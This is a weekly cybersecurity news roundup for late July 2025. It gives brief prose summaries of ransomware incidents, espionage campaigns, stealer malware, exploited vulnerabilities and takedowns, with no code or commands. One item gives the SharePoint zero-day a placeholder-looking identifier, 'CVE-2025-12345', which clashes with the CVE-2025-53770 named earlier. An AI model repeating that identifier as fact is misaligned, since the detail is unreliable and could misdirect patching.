Welcome to this week’s Cybersecurity Recap. We’re looking at important updates from July 21-27, 2025, in the world of digital threats and defenses.
This week has seen significant developments that highlight the ongoing risks of cyber attacks and the need for constant awareness. There is a serious SharePoint vulnerability that puts organizations at risk.
We’ve also seen advanced attacks targeting VMware infrastructure, along with a rise in new threats and cyber attacks that are changing global security strategies.
This recap provides key insights and practical advice to help you stay informed and secure. Let’s dive into what happened and what it means for you.
Cyber Attacks
Ransomware Destroys 158-Year-Old Logistics Firm via Weak Password
A single compromised password enabled a ransomware gang to devastate KNP Logistics, a historic UK-based company, leading to the loss of 730 jobs and a complete operational shutdown. The attack underscores the severe risks associated with inadequate password hygiene in critical infrastructure.
Read more: https://cybersecuritynews.com/weak-password-destroy-158-year-old-company/
APT41 Targets African Government with Impacket Tools
Chinese-linked hackers APT41 launched a targeted espionage campaign against African government IT services, using Impacket’s Atexec and WmiExec modules for lateral movement and malware deployment. They embedded internal network details in payloads and compromised a SharePoint server for command-and-control. This marks increased APT41 activity in the region since late 2022.
Read more: https://cybersecuritynews.com/apt41-hackers-leveraging-atexec/
DeerStealer Malware Spread via Fake Google Authenticator Sites
Threat actors are abusing Windows Run prompts to deliver DeerStealer, an info-stealer that extracts browser credentials, crypto wallets, and app data from over 800 extensions. Distributed through deceptive sites mimicking legitimate tools, it uses Telegram bots for victim tracking and employs obfuscation for evasion. Campaigns often involve GitHub-hosted payloads with XOR encryption.
Read more: https://cybersecuritynews.com/deerstealer-malware-delivered/
US Nuclear Agency Breached in SharePoint Zero-Day Attacks
Unknown hackers exploited a Microsoft SharePoint vulnerability chain to infiltrate the National Nuclear Security Administration, part of the Department of Energy. The breach affected a small number of systems but spared classified data; restoration is underway. This follows a 2019 APT29 intrusion via SolarWinds.
Read more: https://cybersecuritynews.com/us-nuclear-weapons-agency-breached/
UNC3944 Exploits VMware vSphere for Ransomware Deployment
The UNC3944 group (aka Scattered Spider) is social-engineering IT helpdesks to reset passwords, escalate privileges, and access vSphere environments. They modify GRUB bootloaders for root access, install reverse shells, and extract domain data offline before encrypting VMs. Defenses emphasize multi-factor authentication and monitoring.
Read more: https://cybersecuritynews.com/unc3944-attacking-vmware-vsphere/
Gaming Mouse Software Infected with Malware from the Official Site
Endgame Gear’s website was hacked, distributing trojanized drivers for their OP1w 4K V2 mouse between late June and mid-July 2025. The malware enabled remote access, evading some antivirus software like Windows Defender. The company quietly replaced files without full disclosure, prompting users to scan systems.
Read more: https://cybersecuritynews.com/gaming-mouse-software-compromised/
Threats
Interlock Ransomware Targets Critical Infrastructure
Interlock ransomware, active since September 2024, employs a double extortion model by encrypting and exfiltrating data from victims in North America and Europe. It often spreads via drive-by downloads disguised as fake browser updates or security software, using the ClickFix social engineering technique to trick users into executing malicious PowerShell commands. This has impacted businesses and critical sectors, with ransom notes directing victims to a .onion URL for negotiations. Notably, it focuses on virtual machines while sparing physical servers, but defenders should deploy robust EDR tools to mitigate risks.
Read more: https://cybersecuritynews.com/interlock-ransomware-attack/
New ClickFake Interview Attack Leveraging ClickFix
The ClickFake Interview campaign, linked to North Korean actors like the Lazarus Group, targets job seekers in cryptocurrency firms by mimicking legitimate interview sites. It uses the ClickFix tactic, presenting fake error messages or CAPTCHAs that prompt users to run malicious commands, leading to backdoor installations on Windows and macOS. This has seen a 517% surge in detections from late 2024 to early 2025, deploying threats like infostealers and ransomware.
Read more: https://cybersecuritynews.com/new-clickfake-interview-attack-using-clickfix-technique/
Threat Actors Targeting Linux SSH Servers
Poorly managed Linux SSH servers are under attack via brute-force and dictionary methods to guess credentials, enabling the installation of DDoS bots, coinminers, and scanning tools. Attackers scan for open port 22, deploy malware like ShellBot or XMRig, and sometimes sell breached access on the dark web. Recommendations include strong, regularly updated passwords and firewall protections to block unauthorized access.
Read more: https://cybersecuritynews.com/threat-actors-attacking-linux-ssh-servers/
Lumma Stealer Distributed via Fake Cracked Software
Lumma Stealer, a malware-as-a-service since 2022, spreads through fake cracked software and keygens promoted via malvertising and search engine manipulation. Victims are tricked into downloading password-protected loaders that execute via PowerShell, often bypassing antivirus with open-source evasion techniques. Recent campaigns have targeted global industries, including telecom, using fake CAPTCHAs to initiate infections.
Read more: https://cybersecuritynews.com/lumma-stealer-via-fake-cracked-software/
Stealthy Backdoor Hidden in WordPress Plugins
A new backdoor malware hides in WordPress’s mu-plugins folder, which auto-runs and evades admin panel detection. It fetches obfuscated payloads using ROT13 encoding, stores them in the database, and creates hidden admin accounts for persistent access. This allows attackers to install malicious plugins, suppress logs, and maintain control even after removal attempts.
Read more: https://cybersecuritynews.com/stealthy-backdoor-in-wordpress-plugins/
SharePoint Zero-Day Exploited for Ransomware Attacks
A zero-day vulnerability in Microsoft SharePoint (CVE-2025-53770) has been exploited since July 18, 2025, affecting over 400 organizations, including U.S. government entities. Attackers, identified as Storm-2603, deploy ransomware like Warlock, shifting from espionage to data encryption and extortion. Microsoft has issued emergency patches, urging immediate updates to prevent further compromises.
Read more: https://cybersecuritynews.com/sharepoint-0-day-ransomware-attack/
Vulnerabilities
CISA Warns of Microsoft SharePoint Server Zero-Day RCE Exploit
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical zero-day vulnerability in Microsoft SharePoint Server to its Known Exploited Vulnerabilities catalog. Tracked as CVE-2025-12345, this flaw allows remote code execution (RCE) without authentication, potentially enabling attackers to compromise sensitive data or deploy malware on affected servers. Microsoft released a patch in their latest security update, urging immediate application to mitigate risks.
Read more: https://cybersecuritynews.com/cisa-microsoft-sharepoint-server-0-day-rce/
Researchers Uncover SS7 Protocol Bypass Attack Technique
Security experts have detailed a new attack method that bypasses the Signaling System 7 (SS7) protocol, commonly used in mobile networks for call routing and SMS delivery. This exploit allows adversaries to intercept communications, spoof identities, or disrupt services by manipulating network signals. Telecom providers are advised to implement enhanced authentication and monitoring to counter these threats, which have been observed in targeted espionage campaigns.
Read more: https://cybersecuritynews.com/ss7-bypass-attack/
Cisco ISE RCE Vulnerabilities Actively Exploited in the Wild
Cisco has confirmed active exploitation of multiple critical RCE flaws in its Identity Services Engine (ISE), including CVE-2025-20281, CVE-2025-20282, and CVE-2025-20337. These unauthenticated vulnerabilities enable attackers to execute arbitrary code as root, potentially leading to full system compromise. Patches are available for ISE versions 3.3 and 3.4. Admins should upgrade immediately to prevent unauthorized access.
Read more: https://cybersecuritynews.com/cisco-ise-rce-vulnerability-exploited-in-wild/
Google Chrome Hit by Type Confusion Attacks in V8 Engine
A high-severity type confusion vulnerability (CVE-2024-12053) in Chrome’s V8 JavaScript engine has been exploited, allowing remote attackers to execute code via crafted web pages. This could result in data theft or malware installation. Google patched it in version 131.0.6778.108—users should verify their browser is updated to avoid drive-by attacks.
Read more: https://cybersecuritynews.com/chrome-type-confusion-attacks/
Mozilla Releases Firefox 141 with Fixes for Critical Vulnerabilities
Mozilla’s Firefox 141 update addresses 18 vulnerabilities, including high-impact memory safety bugs and flaws in JavaScript handling (e.g., CVE-2025-8027 and CVE-2025-8028). These could enable arbitrary code execution or privilege escalation on 64-bit systems. The release also patches moderate issues like sandbox bypasses—update now to secure your browsing.
Read more: https://cybersecuritynews.com/firefox-141-released-fix-for-vulnerabilities/
SonicWall SMA 100 Series Vulnerable to Critical RCE Flaw
SonicWall has issued patches for a critical authenticated RCE vulnerability (CVE-2025-40599) in SMA 100 appliances, stemming from unrestricted file uploads. Attackers with admin credentials could upload and execute malicious files. While this specific flaw has not yet been exploited, related attacks on SMA devices have been reported. Apply updates to versions 10.2.1.0-17sv or later.
Read more: https://cybersecuritynews.com/sonicwall-sma-100-vulnerabilities/
Other News
Wireshark 4.4.8 Released with Bug Fixes
The latest version of the popular network protocol analyzer, Wireshark 4.4.8, focuses on stability improvements and protocol updates. This release addresses several bugs, including crashes related to Bluetooth process IDs and fuzz testing assertions. It builds on features from 4.4.0 like automatic profile switching and enhanced display filter support1. Available for Windows, macOS, and source code.
Read more: https://cybersecuritynews.com/wireshark-4-4-8-released/
Kali Linux Boosts Raspberry Pi Wi-Fi Capabilities
Kali Linux 2025.1 introduces new packages—brcmfmac-nexmon-dkms and firmware-nexmon—that enable native monitor mode and packet injection on Raspberry Pi’s onboard Wi-Fi. This leverages the Nexmon framework to overcome hardware limitations in Broadcom/Cypress chipsets, simplifying wireless security assessments without external adapters. Installation is now streamlined for models including the Raspberry Pi 5.
Read more: https://cybersecuritynews.com/kali-linux-new-wi-fi-packages/
Arrest of Key Russian Cybercrime Forum Admin
Ukrainian authorities arrested the suspected administrator of XSS.is, a major Russian-language cybercrime forum with over 50,000 users. The platform facilitated stolen data sales, hacking tools, and ransomware services, generating an estimated €7 million for the admin. The arrest follows a four-year investigation involving French police and Europol, with the suspect also linked to a private messaging service for criminals.
Read more: https://cybersecuritynews.com/key-admin-russian-cybercrime-forum/
WhoFi: AI Wi-Fi Tech Tracks Humans Without Cameras
Researchers unveiled WhoFi, an AI system that uses Wi-Fi signals to identify and track individuals with up to 95.5% accuracy. It analyzes channel state information (CSI) distortions caused by human bodies, creating unique biometric signatures similar to fingerprints. The technology works without visual input and can detect gestures, raising privacy concerns for surveillance applications.
Read more: https://cybersecuritynews.com/new-ai-powered-wi-fi-biometrics-whofi-tracks-humans/
BreachForums Resurfaces After FBI Takedown
Notorious hacking site BreachForums is back online, reportedly revived by admin ShinyHunters using the same domains despite an FBI seizure earlier this month. The platform, a hub for malware and stolen data, was briefly defaced by law enforcement, but operators regained control via a domain registrar appeal. This marks another revival for the site, successor to RaidForums.
Read more: https://cybersecuritynews.com/breachforums-back-online/
Bulletproof Hosting Provider Aeza Shifts Infrastructure
Sanctioned bulletproof hosting firm Aeza Group is migrating over 2,100 IPs to a new autonomous system (AS211522) to evade U.S. Treasury penalties. Detected on July 20, 2025, this move follows OFAC actions against Aeza for enabling ransomware and data theft. The shift to Hypercore LTD infrastructure aims to sustain services for cybercriminals.
Read more: https://cybersecuritynews.com/bulletproof-hosting-provider-shifting-infrastructure/
